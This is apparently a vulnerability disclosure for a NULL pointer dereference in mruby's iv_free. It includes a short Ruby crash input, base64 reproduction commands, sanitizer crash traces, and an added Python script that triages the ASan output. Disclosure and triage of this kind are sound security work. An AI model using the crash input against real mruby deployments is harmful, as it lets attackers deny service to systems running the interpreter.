There is a NULL Pointer Dereference in iv_free (src/variable.c:232:20). This bug has been found on mruby's latest commit (hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a) on Ubuntu 20.04 for x86_64/amd64.
3.times{e=0,"#{* =c={}
[y:0,**0]
0}"}
1- Clone the repo and build it with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake
2- Use mruby to execute the poc:
$ echo -ne "My50aW1lc3tlPTAsIiN7KiA9Yz17fQpbeTowLCoqMF0KMH0ifQ==" | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
/home/faraday/mruby/src/variable.c:232:20: runtime error: load of misaligned address 0x000000000009 for type 'mrb_value *' (aka 'struct mrb_value *'), which requires 8 byte alignment
0x000000000009: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==77626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x0000007e9575 bp 0x62f000017fb8 sp 0x7fff1e800280 T0)
==77626==The signal is caused by a READ memory access.
==77626==Hint: address points to the zero page.
#0 0x7e9574 in iv_free /home/faraday/mruby/src/variable.c:232:20
#1 0x7e9574 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
#2 0x5efb1a in obj_free /home/faraday/mruby/src/gc.c:856:5
#3 0x5e26a5 in free_heap /home/faraday/mruby/src/gc.c:433:9
#4 0x5e26a5 in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
#5 0x63e1de in mrb_close /home/faraday/mruby/src/state.c:195:3
#6 0x4cb74a in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c
#7 0x7fbe060530b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#8 0x41f89d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41f89d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
==77626==ABORTING
Running the same script with a release build (without asan) results in a segfault due to the invalid dereference.
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
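Triaging a report like the one above, as an added example that is not part of the original issue and not mruby code: a small Python parser pulls the faulting address, access type and crash site out of the sanitizer output, flags that the address lies in the zero page (a NULL-range base plus a small field offset rather than a wild pointer) and that the crash only surfaced at interpreter teardown under mrb_close, which is what tells a maintainer to look for the corruption earlier than the crashing frame. The sample is this report's own output trimmed to the lines the parser needs; PAGE_SIZE is an assumed 4 KiB page matching ASan's "zero page" hint.

```python
import re

# Sanitizer output from this report, trimmed to the lines the triage needs (sample input).
SAMPLE_REPORT = """\
/home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
AddressSanitizer:DEADLYSIGNAL
==77626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x0000007e9575 bp 0x62f000017fb8 sp 0x7fff1e800280 T0)
==77626==The signal is caused by a READ memory access.
==77626==Hint: address points to the zero page.
    #0 0x7e9574 in iv_free /home/faraday/mruby/src/variable.c:232:20
    #1 0x7e9574 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
    #2 0x5efb1a in obj_free /home/faraday/mruby/src/gc.c:856:5
    #3 0x5e26a5 in free_heap /home/faraday/mruby/src/gc.c:433:9
    #4 0x5e26a5 in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
    #5 0x63e1de in mrb_close /home/faraday/mruby/src/state.c:195:3
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
==77626==ABORTING
"""

ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: (\w+) on unknown address (0x[0-9a-fA-F]+)")
ACCESS_RE = re.compile(r"The signal is caused by a (READ|WRITE) memory access")
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-fA-F]+ in (\S+) (\S+?)(?::(\d+))?(?::\d+)?$", re.M)
PAGE_SIZE = 0x1000  # assumed 4 KiB page: the "zero page" ASan refers to in its hint


def triage(report: str) -> dict:
    """Classify a sanitizer SEGV report: where it faulted, how, and whether it is NULL-derived."""
    err = ERROR_RE.search(report)
    if err is None:
        raise ValueError("no AddressSanitizer ERROR line in report")
    signal, address = err.group(1), int(err.group(2), 16)
    access = ACCESS_RE.search(report)
    frames = [(fn, path, int(line) if line else None) for fn, path, line in FRAME_RE.findall(report)]
    if not frames:
        raise ValueError("no stack frames in report")
    return {
        "signal": signal,
        "address": address,
        "access": access.group(1) if access else "UNKNOWN",
        # address < PAGE_SIZE: a NULL-range base plus a small struct-field offset, not a wild pointer
        "null_derived": address < PAGE_SIZE,
        # UBSan fires first here: the field access through a tiny base is reported as misaligned
        "ubsan_misaligned": "misaligned address" in report,
        "crash_site": frames[0],
        # a frame under mrb_close/mrb_gc_destroy means the object was already corrupt and the
        # fault only surfaced at teardown, so the root cause lies in the code that built it
        "during_teardown": any(fn in ("mrb_close", "mrb_gc_destroy") for fn, _, _ in frames),
    }
```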
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.